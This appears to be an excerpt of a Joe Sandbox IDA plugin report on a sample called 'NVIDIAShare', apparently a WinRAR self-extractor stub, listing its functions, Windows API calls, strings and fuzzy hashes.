Instruction Fuzzy Hash: BE41B471900259A6FF22EB61CC44EDE737CAF54349F0048E5A6CDE3082DB398BC88B60

Function 01011218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0101122E

Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 01011251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 01011263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 01011274
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011284
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 010112CF
__aullrem.LIBCMT ref: 01011379

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
Instruction ID: c58816a347762b16a986687b2ae2cdc61769bce80be2144e975bca92625e5424
Opcode Fuzzy Hash: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
Instruction Fuzzy Hash: CC4107B1508306AFC754DF65C8849ABBBF9FF88214F00892EF6D6C6204E739E559CB52

Function 01002210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 01002536

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Strings

xc%u, xrefs: 0100275A
x%u, xrefs: 010026FD
;%u, xrefs: 01002523

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
Instruction ID: b00bfddbf71078920fbd15b6587dc51bc22943a1d932c61db0b363edee86153a
Opcode Fuzzy Hash: 4308e38f9dbd4e020f9c28d07df30d2ff0e43c7d2a94fb945472a349a3545230
Instruction Fuzzy Hash: 35F119706043429BFB17EB28C598BFE7BDA5F94300F0845BDEEC69B2C2CB6495458762

Function 01019CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01019D0A

Strings

</style>, xrefs: 01019E52
</p>, xrefs: 01019DE8
>, xrefs: 01019D4B
<style>, xrefs: 01019E30
<br>, xrefs: 01019DFE

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
Instruction ID: 01e22e2e6d2abbea84964a27813895f95d7ba3ef1aa2a810036fd3d266d65a0b
Opcode Fuzzy Hash: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
Instruction Fuzzy Hash: 50515A2670032391EB746A6DD8317B673E4DFA0758F99045EEAC18B1C8FB6D88818261

Function 0102F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0102FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0102F6CF
__fassign.LIBCMT ref: 0102F74A
__fassign.LIBCMT ref: 0102F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0102F78B
WriteFile.KERNEL32(?,00000000,00000000,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7AA
WriteFile.KERNEL32(?,00000000,00000001,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7E3

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
Instruction ID: 65a1d511bb19669f7df425ab9cb1dcddc75edcf7d8d28d17e0bd504c170005a6
Opcode Fuzzy Hash: 9e3cb9afe3e8fee8ea54653eafd8b524151f3635baf79342708bf1779dd7ee4b
Instruction Fuzzy Hash: EF51B6B1D0025A9FDB10CFA8D885AEEFBF8FF09310F14415AE995E7251E771A940CBA0

Function 01022900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 01022937
___except_validate_context_record.LIBVCRUNTIME ref: 0102293F
_ValidateLocalCookies.LIBCMT ref: 010229C8
__IsNonwritableInCurrentImage.LIBCMT ref: 010229F3
_ValidateLocalCookies.LIBCMT ref: 01022A48

Strings

csm, xrefs: 010229DD

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
Instruction ID: f3f7b3ca64b21dfbc705c6b47e95f3eb92a020606cac315b7f150a5e2c7df5da
Opcode Fuzzy Hash: 06bfc4f05fc9d4475fb177d7d609e6c3a67f46acfdb95a9c46d0eb4ae11b0a87
Instruction Fuzzy Hash: 1941A230A00229AFCF10DFACC880A9EBFF5BF45364F1481A5E895AB392D775D955CB90

Function 01019ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 01019EEE
GetWindowRect.USER32(?,00000000), ref: 01019F44
ShowWindow.USER32(?,00000005,00000000), ref: 01019FDB
SetWindowTextW.USER32(?,00000000), ref: 01019FE3
ShowWindow.USER32(00000000,00000005), ref: 01019FF9

Strings

RarHtmlClassName, xrefs: 01019FA5

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
Instruction ID: 0ad53bd097c111e328bfe78f90bff9c6bd1d125c2d8257d4577bc6f76f565399
Opcode Fuzzy Hash: 68075019b895c002f67029064c5468feb9d67fa10530555958e737b20652f900
Instruction Fuzzy Hash: 2741BF32504210EFDB625F689C48B6BBFB8FF48755F004599F9C99E05ACB39D908CBA1

Function 01019955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0101995E
_wcslen.LIBCMT ref: 01019993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 01019987
 , xrefs: 01019A21
<br>, xrefs: 010199DF
, xrefs: 010199B0

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
Instruction ID: 38924c30123a56f2ce046835b1cd32376b6faf3910bc98440ca2b0d0564023b0
Opcode Fuzzy Hash: 20bc620946a266f847a315b57d534d067da2229c7d0edcda8da3f8cad4dbfc4f
Instruction Fuzzy Hash: EC31503364434655DE31AF589C51BBB73E8FB80714F90441EF8C68B284FA6CA94883E1

Function 0102C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0102C868: _free.LIBCMT ref: 0102C891

_free.LIBCMT ref: 0102C8F2

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 0102C8FD
_free.LIBCMT ref: 0102C908
_free.LIBCMT ref: 0102C95C
_free.LIBCMT ref: 0102C967
_free.LIBCMT ref: 0102C972
_free.LIBCMT ref: 0102C97D

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: d49eef682295cc6da29031b70fd06714aba967410b75ace28d1d2930ad781325
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: ED111F71580B26AAF520B7B1CD05FCF7BEC9F25B10F508C16F2DD66061DAA5B509CB50

Function 0101E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0101E669,0101E5CC,0101E86D), ref: 0101E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0101E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0101E630

Strings

KERNEL32.DLL, xrefs: 0101E600
ReleaseSRWLockExclusive, xrefs: 0101E625
AcquireSRWLockExclusive, xrefs: 0101E615

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
Instruction ID: eed29a717fad5c5207547d9515824649d79a3a4fc0f0b95e3132f7e2b72a8293
Opcode Fuzzy Hash: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
Instruction Fuzzy Hash: 3AF0C2317402229B5B734E69DC94A6E76CC6F8D6D13400CB9EEC5DB11DEB2DC4909B90

Function 0101146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 010114C2

Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010114E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 01011500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 01011513
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011523
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011533

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
Instruction ID: f583d2db3ec9669b8f681982f0b0e9978481b5ab90780b13c27df6cb8ad16a9f
Opcode Fuzzy Hash: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
Instruction Fuzzy Hash: 4231E779108346ABC704DFA8C88499BBBF8BF98614F444A1EF999C3210E734D549CBA6

Function 01022AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01022AF1,010202FC,0101FA34), ref: 01022B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01022B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022B2F
SetLastError.KERNEL32(00000000,01022AF1,010202FC,0101FA34), ref: 01022B81

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
Instruction ID: bb55ba9f954199ee4e3bc201621d1030e3cecd48d3f3146a1eda6f64354b6752
Opcode Fuzzy Hash: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
Instruction Fuzzy Hash: C501F7321083326EAA7B29F8BC84A6B2F9DFF55774B60077AF5D0490D4EF1A48009344

Function 010297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
_free.LIBCMT ref: 0102981C
_free.LIBCMT ref: 01029844
SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 01029851
SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
_abort.LIBCMT ref: 01029863

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 67f4cd3fce6b0d182a956079619c123b32db81bee57c7cd1c03e4f2cd32049f7
Instruction ID: fef6a1ff4ba0ac7d96841ccccfb77500a72f15c4e6cfb2b33daae18bd342465a
Opcode Fuzzy Hash: 67f4cd3fce6b0d182a956079619c123b32db81bee57c7cd1c03e4f2cd32049f7
Instruction Fuzzy Hash: 23F02D35100633E6D7633238BC48B5B2BEDAFE0778F290125F7D496145EE7584068224

Function 0101DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101DC72
TranslateMessage.USER32(?), ref: 0101DC7C
DispatchMessageW.USER32(?), ref: 0101DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC91

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
Instruction ID: d24f8354f28d46ca2992a11095e7357c1ccffc76a57a4ffd0eac8bcd5c2e9692
Opcode Fuzzy Hash: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
Instruction Fuzzy Hash: 8BF08C32A0021ABBDB306AE5EC4CDCBBFBCFF42791B004411F54AD6018D63A804AC7E0

Function 0100C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 0100B92D: _wcsrchr.LIBVCRUNTIME ref: 0100B944

_wcslen.LIBCMT ref: 0100C197
_wcslen.LIBCMT ref: 0100C1DF

Strings

.sfx, xrefs: 0100C11A
.exe, xrefs: 0100C10B
.rar, xrefs: 0100C0E1, 0100C134

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
Instruction ID: f8fdc0eb304a38a48822d4014724dbe1f3f42bbe1e60aee1189b1e60e97c2f4e
Opcode Fuzzy Hash: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
Instruction Fuzzy Hash: 3C414821540312A6F733AF788A41ABB77E8EF42704F100ACEF9C56B4C0EB6449C2C391

Function 0101CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0101CE9D

Part of subcall function 0100B690: _wcslen.LIBCMT ref: 0100B696

_swprintf.LIBCMT ref: 0101CED1

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(?,00000066,0104946A), ref: 0101CEF1
EndDialog.USER32(?,00000001), ref: 0101CFFE

Strings

%s%s%u, xrefs: 0101CEC6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

